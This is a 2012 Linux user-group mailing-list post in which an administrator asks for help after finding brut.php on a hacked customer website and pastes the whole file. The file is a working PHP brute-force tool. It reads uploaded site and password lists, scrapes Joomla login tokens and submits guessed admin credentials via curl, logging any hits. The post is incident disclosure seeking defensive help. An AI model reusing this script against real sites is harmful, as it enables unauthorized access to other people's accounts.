[SLUG] Customer site hacked with brut.php - what to do?

David Lyon Tue, 21 Aug 2012 19:00:19 -0700

I have a customer with a hacked website.

When I ftp'd to their web-server I found this wart (listed below - saved as
brut.php):


How did the hacker put it on my system ? What could it have comprimised ?
What
can I do to stop further consequences?

--- brut.php (don't run this) ---

<body bgcolor="#808080">

<p align="center"><b><font size="5" color="#FFFFFF">#&nbsp; GaStRo
-Dz&nbsp;&nbsp; #</font></b></p>
<p align="center"><b><font color="#FFFFFF">Joomla Speed Brute
Force</font></b></p>
<form method="post" action="" enctype="multipart/form-data">
<p align="center"><b><font color="#FFFFFF">Username</font></b><font
color="#FFFFFF">:
<input type="text" name="usr" value='admin' size="28">  <b>Ex: Admin ;
administrator</b></font></p>
<p align="center"><font color="#FFFFFF">in , administrator ,  ..<br>
</font><b><font color="#FFFFFF">sites list:</font></b><font
color="#FFFFFF">
<input type="file" name="sites" size="34"></font></p>
<p align="center"><font color="#FFFFFF"><br>
</font><b><font color="#FFFFFF">Pass list</font></b><font color="#FFFFFF">
<input type="file" name="w0rds" size="35"></font></p>
<p align="center"><font color="#FFFFFF"><br>
<input type="submit" name="x" value="Start!">
</font></p>
</form>
<p align="center"><font color="#FFFFFF"><b><a href="http://Www.sec4ever.com
">
<font color="#FFFFFF">Www.sec4ever.com</font></a> <span
lang="ar-dz">|</span>
<a href="http://Www.gastro-dz.net";><font color="#FFFFFF">Www.gastro-dz.net
</font></a>
</b></font></p>
<p align="center"><b><font color="#FFFFFF">GreetZ To : OxyL - Damane - Th3
Killer Dz - th3 Viper - L3b r1'z - hacker-1420 - Abu Hamid Madridi -  Al l
Dz Hackerz Team</font></b></p>
<p align="center">&nbsp;</p>

<?
@set_time_limit(0);
# joomla brute force
# Coded by Gastro
#Devloped by Gastro

if($_POST['x']){

echo "<hr>";

$sites = explode("\n",file_get_contents($_FILES["sites"]["tmp_name"])); //
Get Sites !

$w0rds = explode("\n",file_get_contents($_FILES["w0rds"]["tmp_name"])); //
Get w0rdLiSt !

$Attack = new Joomla_brute_Force(); // Active Class

foreach($w0rds as $pwd){

foreach($sites as $site){

$Attack->check_it(txt_cln($site),$_POST['usr'],txt_cln($pwd)); // Brute :D
flush();flush();
}

}

}


# Class & Function'z

function txt_cln($value){  return str_replace(array("\n","\r"),"",$value);
}

class Joomla_brute_Force{

public function check_it($site,$user,$pass){ // print result

if(eregi('com_config',$this->post($site,$user,$pass))){

echo "<b># login successful : $user:$pass -> $site</b><BR>";
$f = fopen("j0s_result.txt","a+"); fwrite($f , "$user:$pass -> $site\n");
fclose($f);
flush();
}else{ echo "# Failed : $user:$pass -> $site<BR>"; flush();}

}

public function post($site,$user,$pass){ // Post -> user & pass

$token = $this->extract_token($site);

$curl=curl_init();

curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT
5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4');
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_POST,1);
curl_setopt($curl,CURLOPT_POSTFIELDS,'username='.$user.'&passwd='.$pass.'&lang=en-GB&option=com_login&task=login&'.$token.'=1');

curl_setopt($curl,CURLOPT_TIMEOUT,20);

$exec=curl_exec($curl);
curl_close($curl);
return $exec;

}

public function extract_token($site){ // get token from source for ->
function post

$source = $this->get_source($site);

preg_match_all("/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si"
,$source,$token);

return $token[1][0];

}

public function get_source($site){ // get source for -> function
extract_token

$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT
5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4');
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_TIMEOUT,20);

$exec=curl_exec($curl);
curl_close($curl);
return $exec;

}

}

?>
-- 
SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/
Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html

[SLUG] Customer site hacked with brut.php - what to do?

Reply via email to